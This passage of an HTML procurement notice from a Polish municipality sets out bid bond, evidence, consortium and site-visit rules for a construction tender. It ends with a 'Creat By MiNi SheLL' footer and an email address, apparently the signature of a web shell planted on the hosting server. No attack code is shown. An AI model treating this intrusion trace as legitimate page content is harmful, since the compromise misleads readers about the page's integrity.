przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej. Oświadczenie Wykonawca może sporządzić zgodnie ze wzorem stanowiącym - załącznik nr 7 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Podmiotowe środki dowodowe.<br/>Zamawiający wezwie Wykonawcę, którego oferta zostanie najwyżej oceniona, do złożenia w wyznaczonym terminie nie krótszym niż 5 dni, następujących podmiotowych środków dowodowych, aktualnych na dzień złożenia podmiotowych środków dowodowych tj.: <br/>a)	Wykazu robót budowlanych (według wzoru stanowiącego załącznik nr 5 do SWZ) wykonanych nie wcześniej niż w okresie ostatnich 5 lat, licząc wstecz od dnia, w którym upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty; <br/>b)	Wykazu osób (według wzoru stanowiącego załącznik nr 6 do SWZ) skierowanych przez wykonawcę do realizacji zamówienia publicznego, a w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami,<br/>c)	Polisę ubezpieczenia odpowiedzialności cywilnej (OC) zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną w wysokości nie mniejszej niż 300 000,00 zł (słownie: trzysta tysięcy złotych).</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.Wykonawca przystępujący do postępowania jest zobowiązany, przed upływem terminu składania ofert, wnieść wadium w kwocie:4500,00 zł brutto (słownie: cztery tysiące pięćset złotych 00/100).<br/>2.Wadium musi obejmować pełen okres związanie ofertą, tj. do dnia 7.09.2024 r.<br/>3.Wadium może być wniesione w jednej lub kilku formach wskazanych w art. 97 ust.7 ustawy Pzp.<br/>4.Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy w banku BS , numer rachunku 23 84440008 0000 0081 5819 0005. <br/>Wadium musi wpłynąć na wskazany rachunek bankowy Zamawiającego najpóźniej dzień przed upływem terminu składania ofert (decyduje data wpływu na rachunek bankowy Zamawiającego).<br/>5. Wadium wnoszone w poręczeniach lub gwarancjach należy załączyć do oferty w oryginale w postaci dokumentu elektronicznego podpisanego kwalifikowanym podpisem elektronicznym przez wystawcę dokumentu.<br/>6.W przypadku , gdy wykonawca nie wniósł wadium lub wniósł w sposób nieprawidłowy lub nie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złożył wniosek o zwrot wadium, w przypadku o którym mowa w art.98 ust 2 pkt 3 ustawy o Pzp, zamawiający odrzuci ofertę na podstawie art.226 ust.1 pkt 14 ustawy o Pzp.<br/>7. Zamawiający dokona zwrotu wadium na zasadach określonych w art.98 ust.1-5 ustawy o Pzp.<br/>8. Zamawiający zatrzymuje wadium wraz z odsetkami na podstawie art.98 ust.6 ustawy o Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku składania oferty wspólnej przez kilku przedsiębiorców (tzw. konsorcjum), wspólnicy muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy. Do oferty należy dołączyć stosowne pełnomocnictwo, podpisane przez osoby upoważnione do składania oświadczeń woli każdego ze wspólników.<br/>Pełnomocnictwo do złożenia oferty musi być złożone w oryginale w takiej samej formie, jak składana oferta (tj. w formie elektronicznej lub postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym). Dopuszcza się także złożenie elektronicznej kopii (skanu) pełnomocnictwa sporządzonego uprzednio w formie pisemnej, w formie elektronicznego poświadczenia sporządzonego stosownie do art. 97 § 2 ustawy z dnia 14 lutego 1991 r. - Prawo o notariacie, które to poświadczenie notariusz opatruje kwalifikowanym podpisem elektronicznym, bądź też poprzez opatrzenie skanu pełnomocnictwa sporządzonego uprzednio w formie pisemnej kwalifikowanym podpisem, podpisem zaufanym lub podpisem osobistym mocodawcy. Elektroniczna kopia pełnomocnictwa nie może być uwierzytelniona przez upełnomocnionego <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmiany umowy opisane są dokładnie w zał. nr 1 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-08-09 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Portal e-Zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-08-09 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający przed terminem złożenia oferty wymaga od wykonawców odbycia wizji lokalnej.<br/>Wizja lokalna odbędzie się w dniu 2.08.2024 r. o godz. 12.30 w budynku przy ul. Berka Joselewicza 1 w Chrzanowie. Przedstawiciele Wykonawców lub Wykonawcy powinni stawić się najpóźniej na 5 minut przed rozpoczęciem wizji lokalnej przed wejściem do budynku przy ul. Berka Joselewicza 1 w Chrzanowie. Z przeprowadzonej wizji lokalnej zostanie sporządzona lista obecności podpisana przez uczestników. Pytania, które pojawią się w czasie wizji lokalnej będą wyjaśniane po otrzymaniu pytań od Wykonawcy złożonej w formie pisemnej przez portal e- Zamówienia i udostępnione na stronie internetowej prowadzonego postępowania.<br/>Wizja lokalna jest warunkiem do złożenia oferty do tego postępowania.<br/>Na podstawie art. 226 ust.1 pkt 18 ustawy w przypadku złożenia oferty bez odbycia wizji lokalnej, Zamawiający odrzuci taką ofertę. <br/>Zamawiający nie zwraca kosztów odbycia wizji lokalnej.<br/><br/>Zamawiający nie wymaga od Wykonawców sprawdzenia dokumentów niezbędnych do realizacji zamówienia.

Creat By MiNi SheLL
Email: jattceo@gmail.com